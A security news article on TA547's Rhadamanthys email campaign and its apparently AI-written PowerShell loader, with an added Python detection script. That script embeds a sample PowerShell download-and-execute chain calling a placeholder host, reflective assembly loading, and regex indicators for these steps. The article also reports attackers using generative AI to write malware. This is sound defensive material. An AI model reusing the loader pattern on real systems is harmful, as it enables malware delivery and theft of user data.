Malicious PowerShell script deploys an AI-written malware

April 22, 2024
PowerShell Script Artificial Intelligence AI Malware Scully Spider Gang

A recently observed cybercriminal campaign delivered malware through a PowerShell script that researchers suspect was written with the help of a generative AI tool such as ChatGPT, Gemini, or Copilot.

According to the reports, the threat actors used this script in an email campaign in March 2024 that targeted numerous organisations in Germany to distribute the Rhadamanthys information stealer.


The Scully Spider threat group is the primary suspect behind this PowerShell script.


Researchers attributed the campaign that used this PowerShell script to the group tracked as TA547, also known as Scully Spider.

The group has been active since 2017 and has a history of distributing a range of malware for Windows and Android, including ZLoader/Terdot, Gootkit, Ursnif, and Mazar Bot. More recently it has added the Rhadamanthys modular information stealer to its toolkit, which can harvest data from the clipboard, browsers, and cookies, among other sources.

This campaign is the first time the researchers observed Scully Spider delivering Rhadamanthys. The emails impersonate Metro, the well-known German cash-and-carry brand, and use invoice-themed lures to trick recipients into opening the attachment.

Each email carries a ZIP archive protected with the password 'MAR26' that contains a malicious Windows shortcut (.LNK) file. When a recipient opens the archive and launches the shortcut, it invokes PowerShell to fetch and execute a remote script, which in turn loads the Rhadamanthys payload in memory rather than writing an executable to disk. That does not make the attack traceless: the archive, the shortcut, and the PowerShell process launch all remain observable on the endpoint, and where PowerShell Script Block Logging is enabled the executed script content is recorded in the Microsoft-Windows-PowerShell/Operational log as event ID 4104.

Furthermore, the researchers noted distinctive characteristics in the PowerShell script: nearly every component is preceded by a comment explaining what it does, a style that is uncommon in hand-written attacker tooling.

These details strongly suggest that a generative AI tool produced, or helped produce, the script. A separate analysis made the same point about the comments: their clarity and grammatical accuracy contrast with typical developer-written code, since LLM output rarely contains the typographical errors that hand-written comments often do. The signal is stylistic only; it does not change what the script does, and detecting the download-and-execute behaviour works the same way regardless of who or what wrote the code.

In their own experiments with LLMs such as ChatGPT (GPT-4), the researchers produced PowerShell scripts of the same style, further reinforcing the likelihood that AI played a role in crafting the code used by Scully Spider.
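The two observations above (a shortcut that makes PowerShell fetch and execute a remote script in memory, and a script whose comments are unusually tidy) can be turned into a triage check for logged script blocks. The following Python is an added example, not code from the article or from the researchers' report. The two script blocks are constructed samples, and the cmdlet and API names it looks for (DownloadString, Invoke-Expression, FromBase64String, Reflection.Assembly Load) are common fileless-loader primitives assumed for illustration, not quotes from the campaign's script.

```python
"""Triage PowerShell script blocks: behavioural indicators first, comment style second."""
import re
from dataclasses import dataclass

# Constructed sample resembling the described chain: remote fetch, in-memory
# execution, and a comment above every statement. Not the campaign's script.
SAMPLE_SUSPECT = r'''
# Define the URL of the remote script to download
$url = "http://example.invalid/stage2.ps1"
# Create a new WebClient object to download the script
$client = New-Object System.Net.WebClient
# Download the script content as a string
$content = $client.DownloadString($url)
# Execute the downloaded script in memory
Invoke-Expression $content
# Decode the Base64-encoded payload
$bytes = [System.Convert]::FromBase64String($encoded)
# Load the decoded assembly into the current process
[System.Reflection.Assembly]::Load($bytes)
'''

# Constructed sample of an ordinary admin script with a terse comment.
SAMPLE_BENIGN = r'''
# cleanup old logs
Get-ChildItem C:\Logs -Filter *.log | Where-Object { $_.LastWriteTime -lt (Get-Date).AddDays(-30) } | Remove-Item
$svc = Get-Service -Name Spooler
if ($svc.Status -ne 'Running') { Start-Service Spooler }
'''

# Assumed indicator set: typical primitives of a download-and-execute loader.
INDICATORS = {
    "remote_fetch": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I),
    "inline_exec": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
}


@dataclass(frozen=True)
class CommentStats:
    code_lines: int
    comment_lines: int
    tidy_comments: int  # capitalised, at least four words

    @property
    def ratio(self) -> float:
        return self.comment_lines / self.code_lines if self.code_lines else 0.0


def comment_stats(script: str) -> CommentStats:
    """Count code lines, comment lines, and comments that read like full sentences."""
    code = comments = tidy = 0
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            comments += 1
            text = line.lstrip("#").strip()
            words = text.split()
            if len(words) >= 4 and text[0].isupper():
                tidy += 1
        else:
            code += 1
    return CommentStats(code, comments, tidy)


def indicator_hits(script: str) -> list[str]:
    """Return the names of every behavioural indicator present, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def triage(script: str) -> dict[str, object]:
    """Verdict from behaviour; comment style is reported only as a side note."""
    stats = comment_stats(script)
    hits = indicator_hits(script)
    # A fetch followed by inline execution, or a reflective load, is the
    # fileless pattern; comments alone never raise the verdict.
    fetch_and_run = {"remote_fetch", "inline_exec"} <= set(hits)
    verdict = "suspicious" if fetch_and_run or "reflective_load" in hits else "benign"
    llm_style = (
        stats.comment_lines >= 4
        and stats.ratio >= 0.8
        and stats.tidy_comments == stats.comment_lines
    )
    return {
        "verdict": verdict,
        "indicators": hits,
        "comment_ratio": round(stats.ratio, 2),
        "llm_style_comments": llm_style,
    }


if __name__ == "__main__":
    for label, sample in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(label, triage(sample))
```

Feed it the ScriptBlockText field of 4104 events (or any script text) and act on the verdict; the comment-style flag is kept separate on purpose, since it is a hint about authorship, not about risk.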

This incident illustrates the evolving role of AI technology in cyber threats and underlines the importance of robust cybersecurity measures to address such attacks.
